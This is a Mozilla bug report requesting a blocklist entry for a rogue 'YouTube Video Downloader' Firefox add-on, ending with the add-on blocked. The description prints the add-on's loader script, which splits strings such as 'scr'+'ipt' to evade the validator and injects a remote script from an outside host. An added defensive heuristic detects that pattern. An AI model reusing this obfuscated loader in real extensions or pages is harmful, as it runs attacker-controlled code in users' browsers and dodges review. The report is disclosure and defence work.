Closed
Bug 1231010
Opened 9 years ago
Closed 8 years ago
Rogue YouTube Video Downloader addon hijacking links and injecting pop ups
Categories
(Toolkit :: Blocklist Policy Requests, defect)
RESOLVED
FIXED
People
(Reporter: Swarnava, Assigned: jorgev)
The unlisted addon YouTube Video Downloader is currently executing remote code to hijack links and inject pop up ads. Homepage: http://addoncrop.com/youtube_video_downloader/

This has been brought to attention in the following post: https://www.reddit.com/r/firefox/comments/3vl3yz/getting_tons_of_popup_tabs_all_of_a_sudden_with/1

A quick inspection of its source code already shows a red flag in its include folder contents, namely the link_modifier.js file, which contains the following code in its entirety:

    var s = document.createElement('scr'+'ipt');
    s.type = 'text/ja'+'va'+'scr'+'ipt';
    s.src = 'http://www.sourcecrab.com/YouTube_Extend/ff_http_extend.js';
    document.getElementsByTagName('head')[0].appendChild(s);

It is evident that the developer intended to bypass the AMO validator (when it was running for unlisted addons) by creating a dangerous element via string concatenation. In this file it loads and executes an external script. I didn't find any notice/content policy informing the user of this malware-like behavior and don't think I needed to inspect more of the source code after finding that file.

Discourse link: https://discourse.mozilla-community.org/t/rogue-youtube-video-downloader-addon-hijacking-links-and-injecting-pop-ups/5784/1
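Added example (not part of the original report, and not the AMO validator's code): a simplified JavaScript heuristic showing how a static check can fold adjacent string literals before pattern matching, so that a split such as 'scr'+'ipt' in the link_modifier.js snippet from the description is still flagged. The function names, rule ids and the sample host remote.example are assumptions made for illustration.

```javascript
// Heuristic sketch only: regex-based, no real JavaScript parsing.

// Merge adjacent same-quote string literals joined by "+",
// e.g. 'scr'+'ipt' -> 'script'. Repeats until nothing changes so that
// chains like 'text/ja'+'va'+'scr'+'ipt' collapse completely.
function foldStringConcats(source) {
  const pair =
    /(['"])((?:\\.|(?!\1)[^\\\n])*)\1\s*\+\s*\1((?:\\.|(?!\1)[^\\\n])*)\1/g;
  let previous;
  do {
    previous = source;
    source = source.replace(pair, '$1$2$3$1');
  } while (source !== previous);
  return source;
}

// Patterns a reviewer would want surfaced in an add-on content script.
const RULES = [
  { id: 'dynamic-script-element',
    re: /createElement\(\s*['"]script['"]\s*\)/i },
  { id: 'remote-script-src',
    re: /\.src\s*=\s*['"](?:https?:)?\/\/[^'"]+['"]/i },
];

// Run the rules on the folded source. hiddenByConcat is true when the
// rule matches only after folding, i.e. the literal was split up.
function scanAddonSource(source) {
  const folded = foldStringConcats(source);
  return RULES.filter((rule) => rule.re.test(folded)).map((rule) => ({
    rule: rule.id,
    hiddenByConcat: !rule.re.test(source),
  }));
}

// Constructed sample with the same shape as the reported file; the host
// is a placeholder and the string is only scanned, never executed.
const SAMPLE = `
var s = document.createElement('scr'+'ipt');
s.type = 'text/ja'+'va'+'scr'+'ipt';
s.src = 'http://remote.example/ext.js';
document.getElementsByTagName('head')[0].appendChild(s);
`;

console.log(scanAddonSource(SAMPLE));
```

A finding with hiddenByConcat set to true is worth prioritising in review, since a plain literal would have worked just as well for legitimate code.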
I can't seem to find this addon on AMO. Is it only hosted from a 3rd party?
Comment 2•9 years ago
Right link from reddit board is http://www.iks.hs-merseburg.de/~gruni/netfaq/homepage-nutzen.html

Seems that it is an unlisted addon and only hosted from 3rd party
(In reply to Lars Gusowski [:lagu] from comment #2)
> Right link from reddit board is
> http://www.iks.hs-merseburg.de/~gruni/netfaq/homepage-nutzen.html
>
> Seems that it is an unlisted addon and only hosted from 3rd party

Thanks Lars, our admins are in an all hands meeting and we will get to them asap
Comment 4•9 years ago
https://www.reddit.com/r/firefox/comments/3vl3yz/getting_tons_of_popup_tabs_all_of_a_sudden_with/ is the right link :( Not sure why I posted a link to the test page from a university :/
Comment 5•8 years ago
Sorry for the delay. I contacted the developers and will give them some time to respond.
Assignee: nobody → jorge
Comment 6•8 years ago
Blocked: https://addons.mozilla.org/en-US/firefox/blocked/i1077
Status: NEW → RESOLVED
Closed: 8 years ago
Resolution: --- → FIXED
Updated•8 years ago
Product: addons.mozilla.org → Toolkit